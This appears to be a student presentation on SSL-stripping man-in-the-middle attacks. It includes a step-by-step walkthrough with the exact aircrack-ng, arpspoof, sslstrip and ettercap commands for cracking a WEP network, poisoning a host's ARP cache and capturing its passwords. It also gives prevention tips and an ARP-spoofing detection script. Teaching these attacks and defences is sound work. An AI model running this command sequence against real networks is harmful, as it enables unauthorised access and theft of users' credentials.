
Man-in-the-Middle Attack With SSL Strip

Kyle Benson, Trevor Kiernan, Glen Saunders

Bruce Schneier's earliest childhood memory is encrypted.

Bruce Schneier's p is irrational, and his q is imaginary.

What is SSL?

Secure Socket Layer
Predecessor to Transport Layer Security (TLS)
Establishes a secure connection between two computers
Important for banking sites and others
Authenticates: the server is actually who it says it is

How Does it Work?

Runs on port 443 (not HTTP's port 80)
Client sends server hello and certificate
Server sends a signed certificate
Verified by a Certificate Authority such as Verisign
Certificate used to encrypt data

What is MITM?

Alice is trying to talk to Bob
Eve jumps in the middle
    ARP spoofing (wireless)
    Physical insertion (wired)
Eve tells Bob she is Alice and Alice that she is Bob
Bruce Schneier killed Eve and Mallory with a birthday attack!

Bruce Schneier is always the Man in the Middle.

What is MITM?

When Alice sends something to Eve (thinking she's Bob), Eve can read it
Eve forwards this information to Bob
Bob replies to Eve (thinking she's Alice)
Eve can read e-mail and intercept supposedly secure data (user names and passwords!)

What is ARP Spoofing?

ARP = Address Resolution Protocol
Alice sends an ARP request (who is 192.168.1.1?)
Eve replies before the router can, so that Alice thinks she is the router
Now Alice's ARP cache is poisoned; she thinks Eve is the router
Eve forwards packets to her router

What is SSLStrip?

Performs the aforementioned MITM attack
Forwards all regular HTTP traffic
Changes Alice's HTTP request to HTTPS
Forwards this request via HTTPS to Bob
An explicit HTTPS request is sent a fake certificate signed by Eve
Replaces images with a secure lock

Bruce Schneier can draw a perfect circle with an Etch-aSketch.

Capturing Information

Ettercap pulls passwords and user names for many different programs and protocols
Displays Bob's IP and URL
SSLStrip creates a log file

Bruce Schneier can break elliptic curve cryptography by bending it to a circle.

What we did

1. Scan for networks
2. Crack a network
3. Connect to the cracked network
4. Learn about a host on the network
5. MITM on that host
6. Strip his/her SSL
7. Scan for usernames and passwords
8. Exit gracefully

Bruce Schneier can divide by zero.

Scanning for Networks

airodump-ng wlan1

Crack it

airodump-ng -c 11 -w target_router wlan1 &
aireplay-ng -1 0 -e target_router -h [faked mac address] wlan1
After a successful connection:
aireplay-ng -3 -e target_router -h [faked mac] wlan1
Let the data rate climb, then:
aircrack-ng target_router-01.cap
Within 5 minutes you should have the WEP key. :-D

Connect

Connect to the router with the card you just attacked with.
It should still have the same faked MAC address it was set to in the previous ARP-replay attack.
So now it's time for some recon.

The tattoos on Bruce Schneier's fists say "Alice" and "Bob". You don't want to make him exchange keys over your face.

Bruce Schneier counts in binary. With his fists.

RECON

nmap -sP 192.168.1.0/28

This keeps the packet count lower and limits it to pinging
We liked 192.168.1.2
Ran an OS fingerprint on it and checked which versions the open ports were using
This generates a lot of traffic
This host looked good, and responded to our probes, so let's MITM.

Find a host

Compilers don't warn Bruce Schneier, Bruce Schneier warns compilers.

RECON homing in

MITM

arpspoof -i wlan0 -t [their ip] [router ip]
arpspoof -i wlan0 -t 192.168.1.2 192.168.1.1

Bruce Schneier is always the Man in the Middle.

SSL strip

sslstrip -a -k -f

-a : log all SSL traffic
-k : kill current sessions
-f : insert a lock icon in their connections

Bruce Schneier's work isn't peer reviewed. He has no peers.

Passwords from the stream

ettercap -T -q -i wlan0

-T : text only
-q : do not display packet contents
-i : interface to use

This will log traffic over our connection and filter the target's passwords, causing them to show in our window. We can pipe this to a file as well.
The set of Bruce Schneier's weaknesses is a mathematical constant. It is represented by the symbol .

If Bruce Schneier wants your plaintext, he'll just squeeze it out of the ciphertext using his bare hands.

Secure your damn network! (WEP is NOT secure!)
Wireshark
How to Prevent?

ARP replies appearing very frequently
Invalid certificate error
Nmap scans

Don't accept certificates that aren't verified
Static ARP tables
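The first warning sign above, ARP replies appearing very frequently, can be checked mechanically. This added example (not part of the original slides) parses tcpdump-style ARP reply lines and flags an IP that is advertised by more than one MAC, or that receives a burst of replies; the log lines, thresholds and addresses are constructed for the demonstration.

```python
import re
from collections import defaultdict

# Constructed tcpdump-style ARP lines (not a capture from the lab network):
# a legitimate reply for the router, then a burst of replies claiming
# the router's IP with a different MAC, then an unrelated host.
SAMPLE_ARP_LOG = """\
10:00:00.100 ARP, Request who-has 192.168.1.1 tell 192.168.1.2
10:00:00.101 ARP, Reply 192.168.1.1 is-at 00:11:22:33:44:55
10:00:05.200 ARP, Reply 192.168.1.1 is-at de:ad:be:ef:00:01
10:00:05.250 ARP, Reply 192.168.1.1 is-at de:ad:be:ef:00:01
10:00:05.300 ARP, Reply 192.168.1.1 is-at de:ad:be:ef:00:01
10:00:05.350 ARP, Reply 192.168.1.1 is-at de:ad:be:ef:00:01
10:00:05.400 ARP, Reply 192.168.1.1 is-at de:ad:be:ef:00:01
10:00:06.000 ARP, Request who-has 192.168.1.7 tell 192.168.1.2
10:00:06.001 ARP, Reply 192.168.1.7 is-at 00:aa:bb:cc:dd:ee
"""

REPLY_RE = re.compile(r"^(\d+):(\d+):(\d+)\.(\d+) ARP, Reply (\S+) is-at (\S+)")


def parse_replies(log):
    """Yield (seconds_since_midnight, ip, mac) for every ARP reply line."""
    for line in log.splitlines():
        m = REPLY_RE.match(line)
        if not m:
            continue  # requests and non-ARP lines are ignored
        h, mi, s, frac = (int(x) for x in m.groups()[:4])
        ts = h * 3600 + mi * 60 + s + frac / 10 ** len(m.group(4))
        yield ts, m.group(5), m.group(6).lower()


def detect_arp_poisoning(log, window=1.0, max_replies=3):
    """Return alerts: ("mac-conflict", ip, [macs]) when one IP is claimed by
    several MACs, and ("reply-burst", ip, count) when more than max_replies
    replies for one IP arrive within `window` seconds."""
    macs, times, alerts = defaultdict(set), defaultdict(list), []
    for ts, ip, mac in parse_replies(log):
        macs[ip].add(mac)
        times[ip].append(ts)
    for ip, seen in macs.items():
        if len(seen) > 1:
            alerts.append(("mac-conflict", ip, sorted(seen)))
    for ip, stamps in times.items():
        stamps.sort()
        for i in range(len(stamps)):  # sliding window over sorted timestamps
            j = i
            while j < len(stamps) and stamps[j] - stamps[i] <= window:
                j += 1
            if j - i > max_replies:
                alerts.append(("reply-burst", ip, j - i))
                break
    return alerts
```

A real deployment would feed live tcpdump output into parse_replies and compare each IP against a static ARP table rather than trusting the first MAC seen.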
